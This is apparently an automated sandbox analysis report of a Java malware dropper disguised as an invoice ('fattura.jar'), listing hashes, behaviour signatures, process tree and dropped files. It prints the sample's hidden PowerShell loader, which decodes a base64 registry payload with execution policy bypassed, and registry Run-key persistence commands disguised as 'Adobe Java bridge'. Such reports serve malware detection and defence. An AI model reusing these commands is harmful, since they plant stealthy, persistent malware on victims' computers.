Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
29-06-2020 18:10
Static task
static1
Behavioral task
behavioral1
Sample
fattura.jar
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
fattura.jar
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
fattura.jar
-
Size
222KB
-
MD5
9f4c61b914d5174226a6591f9e9a2a48
-
SHA1
558fa0ea8e2ea1c3c6b618789a88081eebeeab4c
-
SHA256
eb76c8ea9c1857530e537b318eeac0781f7bbc68ad9e0152bcb2db5a8af71d97
-
SHA512
f433da3b79fdd9f135094fc546988f81f535793a01b3b73803d7ed5f9b6e6eaacc685ee50e73ff7e3c066deeab7208ff64b55e7a5bc704966f8820b6a8dd81fc
Score
8/10
Malware Config
Signatures
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1072 powershell.exe Token: SeDebugPrivilege 3256 powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 1072 powershell.exe 1072 powershell.exe 1072 powershell.exe 3256 powershell.exe 3256 powershell.exe 3256 powershell.exe -
Modifies registry class 1 IoCs
Processes:
wscript.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000_Classes\Local Settings wscript.exe -
Adds Run entry to start application 2 TTPs 8 IoCs
Processes:
WScript.exewscript.exeREG.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tDHMhQUaqL = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\tDHMhQUaqL.vbs\"" WScript.exe Key created \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run wscript.exe Set value (str) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run\ntfsmgr = "\"C:\\Program Files\\Java\\jre1.8.0_66\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\AppData\\Roaming\\ntfsmgr.jar\"" wscript.exe Key created \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run REG.exe Set value (str) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run\Adobe Java bridge = "C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\AIR\\jre13v3bridge.jar" REG.exe Key created \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\software\microsoft\windows\currentversion\run WScript.exe Set value (str) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run\tDHMhQUaqL = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\tDHMhQUaqL.vbs\"" WScript.exe Key created \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run WScript.exe -
Drops startup file 2 IoCs
Processes:
WScript.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tDHMhQUaqL.vbs WScript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tDHMhQUaqL.vbs WScript.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
java.exewscript.execmd.exejavaw.exeWScript.exedescription pid process target process PID 3544 wrote to memory of 816 3544 java.exe wscript.exe PID 3544 wrote to memory of 816 3544 java.exe wscript.exe PID 816 wrote to memory of 1072 816 wscript.exe powershell.exe PID 816 wrote to memory of 1072 816 wscript.exe powershell.exe PID 816 wrote to memory of 2488 816 wscript.exe WScript.exe PID 816 wrote to memory of 2488 816 wscript.exe WScript.exe PID 816 wrote to memory of 1928 816 wscript.exe cmd.exe PID 816 wrote to memory of 1928 816 wscript.exe cmd.exe PID 1928 wrote to memory of 2128 1928 cmd.exe javaw.exe PID 1928 wrote to memory of 2128 1928 cmd.exe javaw.exe PID 816 wrote to memory of 2748 816 wscript.exe javaw.exe PID 816 wrote to memory of 2748 816 wscript.exe javaw.exe PID 2748 wrote to memory of 3084 2748 javaw.exe REG.exe PID 2748 wrote to memory of 3084 2748 javaw.exe REG.exe PID 2488 wrote to memory of 3256 2488 WScript.exe powershell.exe PID 2488 wrote to memory of 3256 2488 WScript.exe powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
javaw.exepid process 2748 javaw.exe -
Blacklisted process makes network request 26 IoCs
Processes:
WScript.exeflow pid process 4 2488 WScript.exe 5 2488 WScript.exe 9 2488 WScript.exe 10 2488 WScript.exe 12 2488 WScript.exe 14 2488 WScript.exe 15 2488 WScript.exe 16 2488 WScript.exe 17 2488 WScript.exe 20 2488 WScript.exe 22 2488 WScript.exe 23 2488 WScript.exe 24 2488 WScript.exe 25 2488 WScript.exe 27 2488 WScript.exe 28 2488 WScript.exe 29 2488 WScript.exe 30 2488 WScript.exe 31 2488 WScript.exe 34 2488 WScript.exe 35 2488 WScript.exe 36 2488 WScript.exe 37 2488 WScript.exe 38 2488 WScript.exe 40 2488 WScript.exe 41 2488 WScript.exe
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\fattura.jar1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\wscript.exewscript C:\Users\Admin\bjzxzjbyqj.vbs2⤵
- Modifies registry class
- Adds Run entry to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$humanRights = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'turK3y').turK3y;$humanRights=$humanRights.replace('!&','m');$Abt = [Convert]::FromBase64String($humanRights);$Out = [System.Text.Encoding]::ASCII.GetString($Abt);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'turK3y' -value $Out -propertytype multistring -force | out-null;"3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\tDHMhQUaqL.vbs"3⤵
- Adds Run entry to start application
- Drops startup file
- Suspicious use of WriteProcessMemory
- Blacklisted process makes network request
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$humanRights = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'turK3y').turK3y;$humanRights=$humanRights.replace('!&','A');$Abt = [Convert]::FromBase64String($humanRights);$Out = [System.Text.Encoding]::ASCII.GetString($Abt);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'turK3y' -value $Out -propertytype multistring -force | out-null;"4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -version 2> C:\Users\Admin\AppData\Local\Temp\output.txt3⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -version4⤵
-
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\ntfsmgr.jar"3⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\REG.exeREG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Adobe Java bridge" /d "C:\Users\Admin\AppData\Roaming\Adobe\AIR\jre13v3bridge.jar"4⤵
- Modifies registry key
- Adds Run entry to start application
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp
-
C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
-
C:\Users\Admin\AppData\Local\Temp\output.txt
-
C:\Users\Admin\AppData\Roaming\ntfsmgr.jar
-
C:\Users\Admin\AppData\Roaming\tDHMhQUaqL.vbs
-
C:\Users\Admin\bjzxzjbyqj.vbs
-
memory/816-1-0x0000000000000000-mapping.dmp
-
memory/1072-3-0x0000000000000000-mapping.dmp
-
memory/1928-6-0x0000000000000000-mapping.dmp
-
memory/2128-7-0x0000000000000000-mapping.dmp
-
memory/2488-4-0x0000000000000000-mapping.dmp
-
memory/2748-11-0x0000000000000000-mapping.dmp
-
memory/3084-15-0x0000000000000000-mapping.dmp
-
memory/3256-16-0x0000000000000000-mapping.dmp